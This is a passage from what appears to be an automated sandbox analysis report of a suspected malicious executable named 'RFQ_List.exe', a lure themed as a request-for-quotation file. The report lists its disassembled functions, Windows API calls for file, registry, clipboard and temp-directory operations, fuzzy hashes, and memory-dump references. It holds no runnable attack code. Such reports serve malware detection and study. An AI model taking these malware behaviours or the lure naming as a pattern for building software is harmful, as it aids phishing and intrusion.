Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
Opcode Fuzzy Hash: e1b0357d7dd7ae1d86e72c14d3f4c1d25802a01c5ec69123f4cd8e600442627b
Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D

Function 00405C2A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15

Function 00405C05 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,0040580A,?,?,00000000,004059E0,?,?,?,?), ref: 00405C0A
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C1E

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: 468109bf43167ec42dafbdb034993651ba0ea03f7208bcc181294849b19367e8
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 22D0C972504520ABC6102728EE0889BBB95EB542717024B35FAA9A22B0CB304C568A98

Function 00405700 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
GetLastError.KERNEL32 ref: 00405714

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768

Function 00405CDC Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4

Function 00405CAD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4

Function 004022DF Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
Instruction ID: df176f915953132b0bb271560c482e71de85830ffa73b9ff1be2ff384974574c
Opcode Fuzzy Hash: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
Instruction Fuzzy Hash: 4AE04F30800208BBDF01AFA4CE49DBD3B79AF00344F14043AF940AB0D5E7F89A819749

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6856b2a6853cfed7dbe1fff2f5d824482863d63baf729e56f82695697e155cc2
Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
Opcode Fuzzy Hash: 6856b2a6853cfed7dbe1fff2f5d824482863d63baf729e56f82695697e155cc2
Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D

Function 00404165 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 00404177

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
Instruction ID: 76ab245bb7d1846facc95ba49394d78ca693920881c876aece34d531b1437416
Opcode Fuzzy Hash: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
Instruction Fuzzy Hash: 9EC09B717407007FDA118F60AD49F1777646B54741F1484397340F50E0C774E450D61C

Function 0040414E Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08

Function 00403258 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Non-executed Functions

Function 004052F3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405351
GetDlgItem.USER32(?,000003EE), ref: 00405360
GetClientRect.USER32(?,?), ref: 0040539D
GetSystemMetrics.USER32(00000002), ref: 004053A4
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
ShowWindow.USER32(?,00000008), ref: 00405440
GetDlgItem.USER32(?,000003EC), ref: 00405461
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
GetDlgItem.USER32(?,000003F8), ref: 0040536F

Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

GetDlgItem.USER32(?,000003EC), ref: 004054B3
CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
CloseHandle.KERNEL32(00000000), ref: 004054C8
ShowWindow.USER32(00000000), ref: 004054EC
ShowWindow.USER32(00000000,00000008), ref: 004054F1
ShowWindow.USER32(00000008), ref: 0040553B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
CreatePopupMenu.USER32 ref: 00405580
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
GetWindowRect.USER32(?,?), ref: 004055B4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
OpenClipboard.USER32(00000000), ref: 00405615
EmptyClipboard.USER32 ref: 0040561B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
GlobalLock.KERNEL32(00000000), ref: 00405631
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
GlobalUnlock.KERNEL32(00000000), ref: 00405665
SetClipboardData.USER32(0000000D,00000000), ref: 00405670
CloseClipboard.USER32 ref: 00405676

Strings

{, xrefs: 00405559

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58

Function 004045B4 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404603
SetWindowTextW.USER32(00000000,?), ref: 0040462D
SHBrowseForFolderW.SHELL32(?), ref: 004046DE
CoTaskMemFree.OLE32(00000000), ref: 004046E9
lstrcmpiW.KERNEL32(Space required: ,0042D268,00000000,?,?), ref: 0040471B
lstrcatW.KERNEL32(?,Space required: ), ref: 00404727
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739

Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791

Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ_List.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\RFQ_List.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817

Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 00404704
A, xrefs: 004046D7
Space required: , xrefs: 00404715, 0040471A, 00404725

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
